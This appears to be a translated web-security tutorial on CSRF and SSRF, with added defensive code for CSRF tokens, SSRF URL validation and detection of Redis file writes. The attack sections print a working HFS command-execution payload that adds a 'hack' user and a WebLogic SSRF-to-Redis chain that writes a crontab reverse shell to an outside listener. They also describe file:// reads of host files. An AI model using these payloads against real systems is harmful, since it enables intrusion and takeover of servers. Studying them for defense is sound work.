CSRF and SSRF

CSRF: cross-site request forgery

Capture the data packet that is sent when the data is modified, and extract the modified request message from it.

Build a page on a server on the external network that carries this packet.

When the logged-in admin carelessly visits the page on the website that holds the captured, modified request, the malicious code is triggered and the information is modified.

Detecting whether CSRF is present

Use Burp Suite to capture the request that modifies the information and send it to Burp Suite's CSRF PoC module. Change some of the values, copy the generated page to the website on the external server, and click the submit button on that external page: the information is modified successfully.

Defense plan

Random Token and Same Origin Policy

A random token is like an ID card attached to each data packet: every packet carries a different token, and only a packet bearing the genuine token is executed. Brute-forcing the token value is not feasible, because the number is too long.

Same-origin policy (weak defensive ability; it can be bypassed by capturing and modifying the data packets)
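As an added example (not code from the original post), the following standard-library Python shows one way to implement the two defenses just described: a per-session random token bound with an HMAC and compared in constant time, backed by an Origin/Referer check as the weaker second layer. SITE_ORIGIN, the server secret and the form field name csrf_token are assumptions for illustration.

```python
# Added example (not code from the original post): one way to implement the
# two CSRF defenses described above with the Python standard library only.
# SITE_ORIGIN and the field name "csrf_token" are assumptions for illustration.
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://example.test"  # assumed origin of the protected site


def issue_token(session_id: str, server_secret: bytes) -> str:
    """Mint a fresh token for this session: random nonce + HMAC over (session, nonce).

    The nonce makes every token different; the HMAC binds it to the session so a
    token captured from one session is useless in another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(server_secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_token(token: str, session_id: str, server_secret: bytes) -> bool:
    """Recompute the HMAC for the presented nonce and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(server_secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def same_origin(headers: dict) -> bool:
    """Origin/Referer check: accept only requests that claim to come from SITE_ORIGIN.

    This is the weaker layer the post mentions: the header may be missing or
    altered in a captured packet, so it backs up the token rather than replacing it."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return False
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def accept_state_change(form: dict, headers: dict, session_id: str, server_secret: bytes) -> bool:
    """Gate for any request that modifies data: both checks must pass."""
    return (
        verify_token(form.get("csrf_token", ""), session_id, server_secret)
        and same_origin(headers)
    )
```

The token is placed in a hidden form field (or a custom header) by the legitimate page; a page hosted on the attacker's external server cannot read it because of the browser's same-origin policy, so the forged submission arrives without a valid token and is rejected even if the Origin header check alone would have been fooled.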

SSRF: server-side request forgery

The most common case is remote upload: the server itself is made to request a remote address and displays the image code.

The server requests its own MySQL database and successfully echoes the MySQL information.

This can be used to probe the internal network.

Read host files:
file://host file path
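The defensive counterpart to the three cases above (fetching the server's own MySQL port, probing the intranet, and reading local files through file://) is to validate a user-supplied URL before the server fetches it. The following is an added example in Python, not code from the original post: it rejects any scheme other than http(s), requires an allowlisted destination host, and refuses hosts whose DNS answers include loopback or internal addresses. ALLOWED_HOSTS, the resolver hook and the sample addresses are assumptions for illustration.

```python
# Added example (not code from the original post): server-side validation of a
# user-supplied URL before the server fetches it, for the "remote upload" case
# described above. Blocks schemes such as file://, requires an allowlisted
# host, and rejects hosts that resolve to loopback or internal addresses
# (such as the server's own MySQL or an intranet host). ALLOWED_HOSTS and the
# resolver hook are assumptions for illustration.
import ipaddress
import socket
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.test"}  # assumed allowlist for remote uploads


def default_resolver(host: str) -> List[str]:
    """Resolve with the system resolver (A and AAAA records)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_public_address(addr: str) -> bool:
    """True only for globally routable unicast addresses."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return ip.is_global and not ip.is_multicast


def check_fetch_url(url: str,
                    resolver: Callable[[str], List[str]] = default_resolver) -> Tuple[bool, str]:
    """Return (allowed, reason). Every rejection names the rule that failed."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host {host!r} not in allowlist"
    try:
        addresses = resolver(host)
    except OSError:
        return False, "name resolution failed"
    if not addresses:
        return False, "host has no addresses"
    # Check every answer: an internal CNAME or a rebinding answer must not slip through.
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"host resolves to non-public address {addr}"
    return True, "ok"
```

The check resolves the name itself so that the decision is made on the addresses the server would actually connect to; the fetch that follows should connect to one of those validated addresses (and not redo the lookup, or follow redirects unchecked), otherwise a second resolution could return a different answer.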

Displayed successfully.

The protocols that can be used on the corresponding website.

HFS vulnerability reproduction

HFS is an HTTP file server that has had a critical code execution vulnerability. HFS opens port 8080, which is probed successfully; searching the Internet then confirms that the vulnerability exists. The attack payload:

http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.} 

Add the user hack with the password 123:

http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.} 

Add the payload.

SSRF in practice

The exploit environment is the WebLogic SSRF vulnerability together with a Redis database; crontab is the scheduled-task file of Redis.

Visit the test WebLogic page http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp and capture the packets.

Access the Redis database of the intranet host. The Redis database can be accessed without authorization. The overall idea:

Bounce a shell to the local port 172.21.22.2:777. The commands are as follows:

Reverse shell command: set xx "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.21.22.2:777 0>&1\n\n\n\n"
Write the shell to the root directory of the website: config set dir /etc
Write the file name: config set dbfilename crontab
Execute the command: save

URL-encode the spaces and add the commands to the data packet.
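From the defender's side, the sequence above (CONFIG SET dir, CONFIG SET dbfilename, SAVE) is a recognisable pattern in Redis command traffic. The following is an added example, not code from the original post: detection logic that runs over lines in the format emitted by redis-cli MONITOR, tracks the two CONFIG SET values per client connection, and raises an alert when a SAVE or BGSAVE would dump the database into a sensitive directory. The sample log lines, the client addresses and the SENSITIVE_DIRS list are constructed for illustration.

```python
# Added example (not code from the original post): detection logic for the
# Redis write-file sequence shown above (CONFIG SET dir + CONFIG SET dbfilename
# + SAVE) run over lines in the format emitted by `redis-cli MONITOR`.
# The log lines, client addresses and sensitive-directory list are constructed
# for illustration.
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Directories where a dumped RDB file becomes code or credentials (constructed list).
SENSITIVE_DIRS = ("/etc", "/var/spool/cron", "/root/.ssh", "/var/www")

# MONITOR line: <timestamp> [<db> <client-ip:port>] "arg" "arg" ...
MONITOR_LINE = re.compile(r'^\S+ \[\d+ (?P<client>[^\]]+)\] (?P<args>.*)$')
QUOTED_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')


def parse_monitor_line(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (client, args) for a MONITOR line, or None if it does not parse."""
    m = MONITOR_LINE.match(line)
    if not m:
        return None
    return m.group("client"), QUOTED_ARG.findall(m.group("args"))


def detect_rdb_file_writes(lines: List[str]) -> List[Dict[str, str]]:
    """Track CONFIG SET dir/dbfilename per client and alert when a SAVE/BGSAVE
    would dump the database into a sensitive directory."""
    pending: Dict[str, Dict[str, str]] = defaultdict(dict)
    alerts: List[Dict[str, str]] = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                pending[client][key] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            target_dir = pending[client].get("dir", "")
            if any(target_dir == d or target_dir.startswith(d + "/") for d in SENSITIVE_DIRS):
                alerts.append({
                    "client": client,
                    "command": cmd,
                    "dir": target_dir,
                    "dbfilename": pending[client].get("dbfilename", "dump.rdb"),
                })
    return alerts


# Constructed sample of MONITOR output: one client performs the sequence,
# another client saves to the normal data directory.
SAMPLE_MONITOR_LOG = [
    '1653000000.000001 [0 172.21.22.9:50514] "set" "xx" "<payload>"',
    '1653000000.000002 [0 172.21.22.9:50514] "config" "set" "dir" "/etc"',
    '1653000000.000003 [0 172.21.22.9:50514] "config" "set" "dbfilename" "crontab"',
    '1653000000.000004 [0 172.21.22.9:50514] "save"',
    '1653000000.000005 [0 10.0.0.8:41000] "config" "set" "dir" "/var/lib/redis"',
    '1653000000.000006 [0 10.0.0.8:41000] "save"',
]

if __name__ == "__main__":
    for alert in detect_rdb_file_writes(SAMPLE_MONITOR_LOG):
        print(alert)
```

Detection is the fallback; the conditions that make the sequence work are the unauthenticated Redis reachable from the WebLogic host and the SSRF that reaches it. In redis.conf, requirepass, protected-mode yes, bind on an internal interface and rename-command CONFIG "" remove the first condition, and validating outbound URLs in the application removes the second.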

The local listener receives the connection successfully!